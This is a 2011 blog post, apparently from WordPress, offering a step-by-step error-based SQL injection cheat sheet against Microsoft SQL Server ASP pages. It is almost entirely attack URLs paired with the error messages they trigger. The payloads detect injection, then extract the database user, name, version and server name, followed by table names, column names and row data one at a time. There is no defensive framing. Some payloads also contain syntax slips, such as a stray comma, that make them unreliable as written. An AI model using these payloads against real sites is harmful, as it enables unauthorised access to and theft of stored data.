Microsoft SQL Error Exploit

31 Dec 2011 Leave a Comment

by Andi Wijaya in SQL Injection

ERROR SQL INJECTION – DETECTION

Integer Injection:
http://[site]/page.asp?id=having 1=1–Column ‘[COLUMN NAME]‘ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

String Injection:
http://[site]/page.asp?id=x’ having 1=1–Column ‘[COLUMN NAME]‘ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

 

 

ERROR SQL INJECTION – EXTRACT DATABASE USER
 
http://[site]/page.asp?id=1 or 1=convert(int,(USER))–Syntax error converting the nvarchar value ‘[DB USER]‘ to a column of data type int.

 

ERROR SQL INJECTION – EXTRACT DATABASE NAME
 
http://[site]/page.asp?id=1 or 1=convert(int,(DB_NAME))–Syntax error converting the nvarchar value ‘[DB NAME]‘ to a column of data type int. 
ERROR SQL INJECTION – EXTRACT DATABASE VERSION
 
http://[site]/page.asp?id=1 or 1=convert(int,(@@VERSION))–Syntax error converting the nvarchar value ‘[DB VERSION]‘ to a column of data type int. 
ERROR SQL INJECTION – EXTRACT SERVER NAME
 
http://[site]/page.asp?id=1 or 1=convert(int,(@@SERVERNAME))–Syntax error converting the nvarchar value ‘[SERVER NAME]‘ to a column of data type int. 

 

ERROR SQL INJECTION – EXTRACT 1st  DATABASE TABLE

http://[site]/page.asp?id=1  or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85)))–Syntax error converting the nvarchar value ‘[TABLE NAME 1]‘ to a column of data type int. 
ERROR SQL INJECTION – EXTRACT 2nd DATABASE TABLE
 
http://[site]/page.asp?id=1  or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85) and ,name>’TABLE-NAME-1‘))–Syntax error converting the nvarchar value ‘[TABLE NAME 2]‘ to a column of data type int. 
ERROR SQL INJECTION – EXTRACT 3rd DATABASE TABLE

http://[site]/page.asp?id=1  or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85) and ,name>’TABLE-NAME-2‘))–Syntax error converting the nvarchar value ‘[TABLE NAME 3]‘ to a column of data type int. 
ERROR SQL INJECTION – EXTRACT 1st TABLE COLUMN NAME

http://[site]/page.asp?id=1  or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name=’TABLE-NAME-1‘))–Syntax error converting the nvarchar value ‘[COLUMN NAME  1]‘ to a column of data type int. 
ERROR SQL INJECTION – EXTRACT 2nd TABLE COLUMN NAME
 
http://[site]/page.asp?id=1  or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name=’TABLE-NAME-1‘ and column_name>’COLUMN-NAME-1‘))–Syntax error converting the nvarchar value ‘[COLUMN NAME 2]‘ to a column of data type int. 
ERROR SQL INJECTION – EXTRACT 3rd TABLE COLUMN NAME
 
http://[site]/page.asp?id=1  or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name=’TABLE-NAME-1‘ and column_name>’COLUMN-NAME-2‘))–Syntax error converting the nvarchar value ‘[COLUMN NAME  3]‘ to a column of data type int. 
ERROR SQL INJECTION – EXTRACT 1st FIELD OF 1st ROW
 
http://[site]/page.asp?id=1  or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1))–Syntax error converting the nvarchar value ‘[FIELD 1 VALUE]‘ to a column of data type int. 
ERROR SQL INJECTION – EXTRACT 2nd FIELD OF 1st ROW

http://[site]/page.asp?id=1  or 1=convert(int,(select top 1 COLUMN-NAME-2 from TABLE-NAME-1))–Syntax error converting the nvarchar value ‘[FIELD 2 VALUE]‘ to a column of data type int. 
ERROR SQL INJECTION – EXTRACT 3nd FIELD OF 1st ROW

http://[site]/page.asp?id=1  or 1=convert(int,(select top 1 COLUMN-NAME-3 from TABLE-NAME-1))–Syntax error converting the nvarchar value ‘[FIELD 3 VALUE]‘ to a column of data type int. 
ERROR SQL INJECTION – EXTRACT 1st FIELD OF 2nd ROW
 
http://[site]/page.asp?id=1  or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1 where COLUMN-NAME-1 NOT in (‘FIELD-1-VALUE‘) order by COLUMN-NAME-1 desc))–Syntax error converting the nvarchar value ‘[FIELD 1 VALUE OF 2ND ROW]‘ to a column of data type int. 
ERROR SQL INJECTION – EXTRACT 1st FIELD OF 3nd ROW
 
http://[site]/page.asp?id=1  or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1 where COLUMN-NAME-1 NOT in (‘FIELD-2-VALUE‘) order by COLUMN-NAME-1 desc))–Syntax error converting the nvarchar value ‘[FIELD 1 VALUE OF 3RD ROW]‘ to a column of data type int.
Advertisement

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Cancel

Connecting to %s

Follow

Get every new post delivered to your Inbox.